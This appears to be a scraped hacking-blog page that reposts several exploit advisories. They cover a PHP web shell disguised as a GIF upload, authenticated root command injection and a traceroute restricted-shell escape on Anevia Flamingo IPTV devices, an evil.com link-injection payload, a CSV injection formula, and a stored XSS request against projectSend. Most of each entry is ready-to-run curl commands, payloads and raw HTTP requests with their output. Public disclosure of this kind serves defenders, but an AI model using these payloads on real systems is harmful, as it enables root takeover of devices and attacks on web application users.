Content-Disposition: form-data; name="newpic"; filename="profile picture.php.gif" Content-Type: image/gif GIF89a <?php echo system($_REQUEST['dx']); ?> ------WebKitFormBoundaryndAPYa0GGOxSUHdF Content-Disposition: form-data; name="submit" ------WebKitFormBoundaryndAPYa0GGOxSUHdF-- =============================== PROOF_OF_CONCEPT =============================== GITHUB_LINK: https://github.com/ctflearner/Vulnerability/blob/main/Teacher_Record_Management_System/trms.md
  20. HireHackking

    Anevia Flamingo XL 3.6.20 - Authenticated Root Remote Code Execution

    HireHackking posted a blog entry in Hacker Technology
    Exploit Title: Anevia Flamingo XL 3.6.20 - Authenticated Root Remote Code Execution Exploit Author: LiquidWorm Vendor: Ateme Product web page: https://www.ateme.com Affected version: 3.6.20, 3.2.9 Hardware revision 1.1, 1.0 SoapLive 2.4.1, 2.0.3 SoapSystem 1.3.1 Summary: Flamingo XL, a new modular and high-density IPTV head-end product for hospitality and corporate markets. Flamingo XL captures live TV and radio content from satellite, cable, digital terrestrial and analog sources before streaming it over IP networks to STBs, PCs or other IP-connected devices. The Flamingo XL is based upon a modular 4U rack hardware platform that allows hospitality and corporate video service providers to deliver a mix of channels from various sources over internal IP networks. Desc: The affected device suffers from authenticated remote code execution vulnerability. A remote attacker can exploit this issue and execute arbitrary system commands granting her system access with root privileges. Tested on: GNU/Linux 3.1.4 (x86_64) Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8g DAV/2 PHP/5.3.6 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2023-5779 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5779.php 13.04.2023 -- > curl -vL http://192.168.1.1/admin/time.php -H "Cookie: PHPSESSID=i3nu7de9vv0q9pi4a8eg8v71b4" -d "ntp=`id`&request=ntp&update=Sync" |findstr root % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0* Trying 192.168.1.1:80... * Connected to 192.168.1.1 (192.168.1.1) port 80 (#0) > POST /admin/time.php HTTP/1.1 > Host: 192.168.1.1 > User-Agent: curl/8.0.1 > Accept: */* > Cookie: PHPSESSID=i3nu7de9vv0q9pi4a8eg8v71b4 > Content-Length: 32 > Content-Type: application/x-www-form-urlencoded > } [32 bytes data] 100 32 0 0 100 32 0 25 0:00:01 0:00:01 --:--:-- 25< HTTP/1.1 302 Found < Date: Thu, 13 Apr 2023 23:54:15 GMT < Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8g DAV/2 PHP/5.3.6 < X-Powered-By: PHP/5.3.6 < Expires: Thu, 19 Nov 1981 08:52:00 GMT < Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 < Pragma: no-cache * Please rewind output before next send < Location: /admin/time.php < Transfer-Encoding: chunked < Content-Type: text/html < * Ignoring the response-body { [5 bytes data] 100 32 0 0 100 32 0 19 0:00:01 0:00:01 --:--:-- 19 * Connection #0 to host 192.168.1.1 left intact * Issue another request to this URL: 'http://192.168.1.1/admin/time.php' * Switch from POST to GET * Found bundle for host: 0x1de6c6321b0 [serially] * Re-using existing connection #0 with host 192.168.1.1 > POST /admin/time.php HTTP/1.1 > Host: 192.168.1.1 > User-Agent: curl/8.0.1 > Accept: */* > Cookie: PHPSESSID=i3nu7de9vv0q9pi4a8eg8v71b4 > < HTTP/1.1 200 OK < Date: Thu, 13 Apr 2023 23:54:17 GMT < Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8g DAV/2 PHP/5.3.6 < X-Powered-By: PHP/5.3.6 < Expires: Thu, 19 Nov 1981 08:52:00 GMT < Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 < Pragma: no-cache < Transfer-Encoding: chunked < Content-Type: text/html < { [13853 bytes data] 14 Apr 03:54:17 ntpdate[8964]: can't find host uid=0(root)<br /> <----------------------<< 14 Apr 03:54:17 ntpdate[8964]: can't find host gid=0(root)<br /> <----------------------<< 100 33896 0 33896 0 0 14891 0 --:--:-- 0:00:02 --:--:-- 99k * Connection #0 to host 192.168.1.1 left intact
  21. HireHackking

    Anevia Flamingo XS 3.6.5 - Authenticated Root Remote Code Execution

    HireHackking posted a blog entry in Hacker Technology
    Exploit Title: Anevia Flamingo XS 3.6.5 - Authenticated Root Remote Code Execution Exploit Author: LiquidWorm Vendor: Ateme Product web page: https://www.ateme.com Affected version: 3.6.5 Hardware revision: 1.1 SoapLive 2.4.0 SoapSystem 1.3.1 Summary: Flamingo XL, a new modular and high-density IPTV head-end product for hospitality and corporate markets. Flamingo XL captures live TV and radio content from satellite, cable, digital terrestrial and analog sources before streaming it over IP networks to STBs, PCs or other IP-connected devices. The Flamingo XL is based upon a modular 4U rack hardware platform that allows hospitality and corporate video service providers to deliver a mix of channels from various sources over internal IP networks. Desc: The affected device suffers from authenticated remote code execution vulnerability. A remote attacker can exploit this issue and execute arbitrary system commands granting her system access with root privileges. Tested on: GNU/Linux 3.14.29 (x86_64) Apache/2.2.22 (Debian) PHP/5.6.0-0anevia2 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2023-5778 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5778.php 13.04.2023 -- $ curl -sL "http://192.168.1.1/admin/time.php" -H "Cookie: PHPSESSID=o4pan20dtnfb239trffu06pid4" -d "ntp_hosts%5B%5D=&ntp_hosts%5B%5D=%60id%60&ntp_address=&update=Apply&request=ntp" |findstr www-data <td>uid=33(www-data)</td> <input type="hidden" name="ntp_hosts[]" value="uid=33(www-data)"/> <td>gid=33(www-data)</td> <input type="hidden" name="ntp_hosts[]" value="gid=33(www-data)"/> <td>groups=33(www-data),6(disk),25(floppy)</td> <input type="hidden" name="ntp_hosts[]" value="groups=33(www-data),6(disk),25(floppy)"/> --- $ curl -sL "http://192.168.1.1/admin/time.php" -H "Cookie: PHPSESSID=o4pan20dtnfb239trffu06pid4" -d "ntp_hosts%5B%5D=&ntp_hosts%5B%5D=%60sudo%20id%60&ntp_address=&update=Apply&request=ntp" |findstr root <td>uid=0(root)</td> <input type="hidden" name="ntp_hosts[]" value="uid=0(root)"/> <td>gid=0(root)</td> <input type="hidden" name="ntp_hosts[]" value="gid=0(root)"/> <td>groups=0(root)</td> <input type="hidden" name="ntp_hosts[]" value="groups=0(root)"/>
  22. HireHackking

    Sales Tracker Management System v1.0 - Multiple Vulnerabilities

    HireHackking posted a blog entry in Hacker Technology
    Exploit Title: Sales Tracker Management System v1.0 – Multiple Vulnerabilities Google Dork: NA Date: 09-06-2023 EXPLOIT-AUTHOR: AFFAN AHMED Vendor Homepage: <https://www.sourcecodester.com/> Software Link: <https://www.sourcecodester.com/download-code?nid=16061&title=Sales+Tracker+Management+System+using+PHP+Free+Source+Code> Version: 1.0 Tested on: Windows 11 + XAMPP CVE : CVE-2023-3184 ============================== CREDENTIAL TO USE ============================== ADMIN-ACCOUNT USERNAME: admin PASSWORD: admin123 ============================= PAYLOAD_USED ============================= 1. <a href=//evil.com>CLICK_HERE_FOR_FIRSTNAME</a> 2. <a href=//evil.com>CLICK_HERE_FOR_MIDDLENAME</a> 3. <a href=//evil.com>CLICK_HERE_FOR_LASTNAME</a> 4. <a href=//evil.com>CLICK_HERE_FOR_USERNAME</a> =============================== STEPS_TO_REPRODUCE =============================== 1. FIRST LOGIN INTO YOUR ACCOUNT BY USING THE GIVEN CREDENTIALS OF ADMIN 2. THEN NAVIGATE TO USER_LIST AND CLCIK ON `CREATE NEW` BUTTON OR VISIT TO THIS URL:`http://localhost/php-sts/admin/?page=user/manage_user` 3. THEN FILL UP THE DETAILS AND PUT THE ABOVE PAYLOAD IN `firstname` `middlename` `lastname` and in `username` 4. AFTER ENTERING THE PAYLOAD CLICK ON SAVE BUTTON 5. AFTER SAVING THE FORM YOU WILL BE REDIRECTED TO ADMIN SITE WHERE YOU CAN SEE THAT NEW USER IS ADDED . 6. AFTER CLICKING ON THE EACH PAYLOAD IT REDIRECT ME TO EVIL SITE ========================================== BURPSUITE_REQUEST ========================================== POST /php-sts/classes/Users.php?f=save HTTP/1.1 Host: localhost Content-Length: 1037 sec-ch-ua: Accept: */* Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7hwjNQW3mptDFOwo X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36 sec-ch-ua-platform: "" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/php-sts/admin/?page=user/manage_user Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=r0ejggs25qnlkf9funj44b1pbn Connection: close ------WebKitFormBoundary7hwjNQW3mptDFOwo Content-Disposition: form-data; name="id" ------WebKitFormBoundary7hwjNQW3mptDFOwo Content-Disposition: form-data; name="firstname" <a href=//evil.com>CLICK_HERE_FOR_FIRSTNAME</a> ------WebKitFormBoundary7hwjNQW3mptDFOwo Content-Disposition: form-data; name="middlename" <a href=//evil.com>CLICK_HERE_FOR_MIDDLENAME</a> ------WebKitFormBoundary7hwjNQW3mptDFOwo Content-Disposition: form-data; name="lastname" <a href=//evil.com>CLICK_HERE_FOR_LASTNAME</a> ------WebKitFormBoundary7hwjNQW3mptDFOwo Content-Disposition: form-data; name="username" <a href=//evil.com>CLICK_HERE_FOR_USERNAME</a> ------WebKitFormBoundary7hwjNQW3mptDFOwo Content-Disposition: form-data; name="password" 1234 ------WebKitFormBoundary7hwjNQW3mptDFOwo Content-Disposition: form-data; name="type" 2 ------WebKitFormBoundary7hwjNQW3mptDFOwo Content-Disposition: form-data; name="img"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundary7hwjNQW3mptDFOwo-- =============================== PROOF_OF_CONCEPT =============================== GITHUB_LINK: https://github.com/ctflearner/Vulnerability/blob/main/Sales_Tracker_Management_System/stms.md
  23. HireHackking

    projectSend r1605 - CSV injection

    HireHackking posted a blog entry in Hacker Technology
    Exploit Title: projectSend r1605 - CSV injection Version: r1605 Bugs: CSV Injection Technology: PHP Vendor URL: https://www.projectsend.org/ Software Link: https://www.projectsend.org/ Date of found: 11-06-2023 Author: Mirabbas Ağalarov Tested on: Windows 2. Technical Details & POC ======================================== Step 1. login as user step 2. Go to My Account ( http://localhost/users-edit.php?id=2 ) step 3. Set name as =calc|a!z| step 3. If admin Export action-log as CSV file ,in The computer of admin occurs csv injection and will open calculator ( http://localhost/actions-log.php ) payload: =calc|a!z|
  24. HireHackking

    Anevia Flamingo XL 3.2.9 - Remote Root Jailbreak

    HireHackking posted a blog entry in Hacker Technology
    Exploit Title: Anevia Flamingo XL 3.2.9 - Remote Root Jailbreak Exploit Author: LiquidWorm Product web page: https://www.ateme.com Affected version: 3.2.9 Hardware revision 1.0 SoapLive 2.0.3 Summary: Flamingo XL, a new modular and high-density IPTV head-end product for hospitality and corporate markets. Flamingo XL captures live TV and radio content from satellite, cable, digital terrestrial and analog sources before streaming it over IP networks to STBs, PCs or other IP-connected devices. The Flamingo XL is based upon a modular 4U rack hardware platform that allows hospitality and corporate video service providers to deliver a mix of channels from various sources over internal IP networks. Desc: Once the admin establishes a secure shell session, she gets dropped into a sandboxed environment using the login binary that allows specific set of commands. One of those commands that can be exploited to escape the jailed shell is traceroute. A remote attacker can breakout of the restricted environment and have full root access to the device. Tested on: GNU/Linux 3.1.4 (x86_64) Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8g DAV/2 PHP/5.3.6 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2023-5780 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5780.php 13.04.2023 -- $ ssh -o KexAlgorithms=+diffie-hellman-group1-sha1 root@192.168.1.1 The authenticity of host '192.168.1.1 (192.168.1.1)' can't be established. RSA key fingerprint is SHA256:E6TaDYkszZMbS555THYEPVzv1DpzYrwJzW1TM4+ZSLk. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.1.1' (RSA) to the list of known hosts. Anevia Flamingo XL root@192.168.1.1's password: Primary-XL> help available commands: bonding config date dns enable ethconfig exit exp firewall help hostname http igmpq imp ipconfig license log mail passwd persistent_logs ping reboot reset route serial settings sslconfig tcpdump timezone traceroute upgrade uptime version vlanconfig Primary-XL> tcpdump ;id tcpdump: illegal token: ; Primary-XL> id unknown command id Primary-XL> whoami unknown command whoami Primary-XL> ping ;id ping: ;id: Host name lookup failure Primary-XL> traceroute ;id BusyBox v1.1.2p2 (2012.04.24-09:33+0000) multi-call binary Usage: traceroute [-FIldnrv] [-f 1st_ttl] [-m max_ttl] [-p port#] [-q nqueries] [-s src_addr] [-t tos] [-w wait] [-g gateway] [-i iface] [-z pausemsecs] host [data size] trace the route ip packets follow going to "host" Options: -F Set the don't fragment bit -I Use ICMP ECHO instead of UDP datagrams -l Display the ttl value of the returned packet -d Set SO_DEBUG options to socket -n Print hop addresses numerically rather than symbolically -r Bypass the normal routing tables and send directly to a host -v Verbose output -m max_ttl Set the max time-to-live (max number of hops) -p port# Set the base UDP port number used in probes (default is 33434) -q nqueries Set the number of probes per ``ttl'' to nqueries (default is 3) -s src_addr Use the following IP address as the source address -t tos Set the type-of-service in probe packets to the following value (default 0) -w wait Set the time (in seconds) to wait for a response to a probe (default 3 sec) -g Specify a loose source route gateway (8 maximum) uid=0(root) gid=0(root) groups=0(root) Primary-XL> version Software Revision: Anevia Flamingo XL v3.2.9 Hardware Revision: 1.0 (c) Anevia 2003-2012 Primary-XL> traceroute ;sh ... ... whoami root id uid=0(root) gid=0(root) groups=0(root) ls -al drwxr-xr-x 19 root root 1024 Oct 3 2022 . drwxr-xr-x 19 root root 1024 Oct 3 2022 .. drwxr-xr-x 2 root root 1024 Oct 21 2013 bin drwxrwxrwt 2 root root 40 Oct 3 2022 cores drwxr-xr-x 13 root root 27648 May 22 00:53 dev drwxr-xr-x 3 root root 1024 Oct 21 2013 emul drwxr-xr-x 48 1000 1000 3072 Oct 3 2022 etc drwxr-xr-x 3 root root 1024 Oct 3 2022 home drwxr-xr-x 11 root root 3072 Oct 21 2013 lib lrwxrwxrwx 1 root root 20 Oct 21 2013 lib32 -> /emul/ia32-linux/lib lrwxrwxrwx 1 root root 3 Oct 21 2013 lib64 -> lib drwx------ 2 root root 12288 Oct 21 2013 lost+found drwxr-xr-x 4 root root 1024 Oct 21 2013 mnt drwxrwxrwt 2 root root 80 May 22 00:45 php_sessions dr-xr-xr-x 177 root root 0 Oct 3 2022 proc drwxr-xr-x 4 root root 1024 Oct 21 2013 root drwxr-xr-x 2 root root 2048 Oct 21 2013 sbin drwxr-xr-x 12 root root 0 Oct 3 2022 sys drwxrwxrwt 26 root root 1140 May 22 01:06 tmp drwxr-xr-x 10 1000 1000 1024 Oct 21 2013 usr drwxr-xr-x 14 root root 1024 Oct 21 2013 var ls /var/www/admin _img configuration.php log_securemedia.php stream_dump.php _lang cores_and_logs_management.php login.php stream_services _lib dataminer_handshake.php logout.php streaming.php _style dvbt.php logs.php support.php about.php dvbt_scan.php main.php template ajax export.php manager.php time.php alarm.php fileprogress.php network.php toto.ts alarm_view.php firewall.php pear upload_helper.php authentication.php get_config power.php uptime.php bridges.php get_enquiry_pending.php read_settings.php usbloader.php cam.php get_upgrade_error.php receive_helper.php version.php channel.php heartbeat.php rescrambling webradio.php channel_xl_list.php include rescrambling.php webtv check_state input.php resilience webtv.php class js resilience.php xmltv.php common license.php restart_service.php config_snmp.php log.php set_oem.php python -c 'import pty; pty.spawn("/bin/bash")' root@Primary-XL:/# cd /usr/local/bin root@Primary-XL:/usr/local/bin# ls -al login -rwxr-xr-x 1 root root 35896 Feb 21 2012 login root@Primary-XL:/usr/local/bin# cd .. root@Primary-XL:/usr/local# ls commands/ bonding firewall mail timezone config help passwd traceroute date hostname persistent_logs upgrade dbg-serial http ping uptime dbg-set-oem igmpq route version dbg-updates-log imp serial vlanconfig dns ipconfig settings ethconfig license sslconfig exp log tcpdump root@Primary-XL:/usr/local# exit exit Primary-XL> enable password: Primary-XL# ;]
  25. HireHackking

    projectSend r1605 - Stored XSS

    HireHackking posted a blog entry in Hacker Technology
    Exploit Title: projectSend r1605 - Stored XSS Application: projectSend Version: r1605 Bugs: Stored Xss Technology: PHP Vendor URL: https://www.projectsend.org/ Software Link: https://www.projectsend.org/ Date of found: 11-06-2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== 1. Login as admin 2. Go to Custom Html/Css/Js (http://localhost/custom-assets.php) 3. Go to new JS (http://localhost/custom-assets-add.php?language=js) 4. Set content as alert("xss"); and set public 5. And Save 6. Go to http://localhost (logout) payload: alert("xss") POST /custom-assets-add.php HTTP/1.1 Host: localhost Content-Length: 171 Cache-Control: max-age=0 sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Linux" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/custom-assets-add.php?language=js Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: log_download_started=false; PHPSESSID=7j8g8u9t7khb259ci4fvareg2l Connection: close csrf_token=222b49c5c4a1755c451637f17ef3e7ea8bb5b6ee616293bd73d15d0e608d9dab&language=js&title=test&content=alert%28%22XSS%22%29%3B&enabled=on&location=public&position=head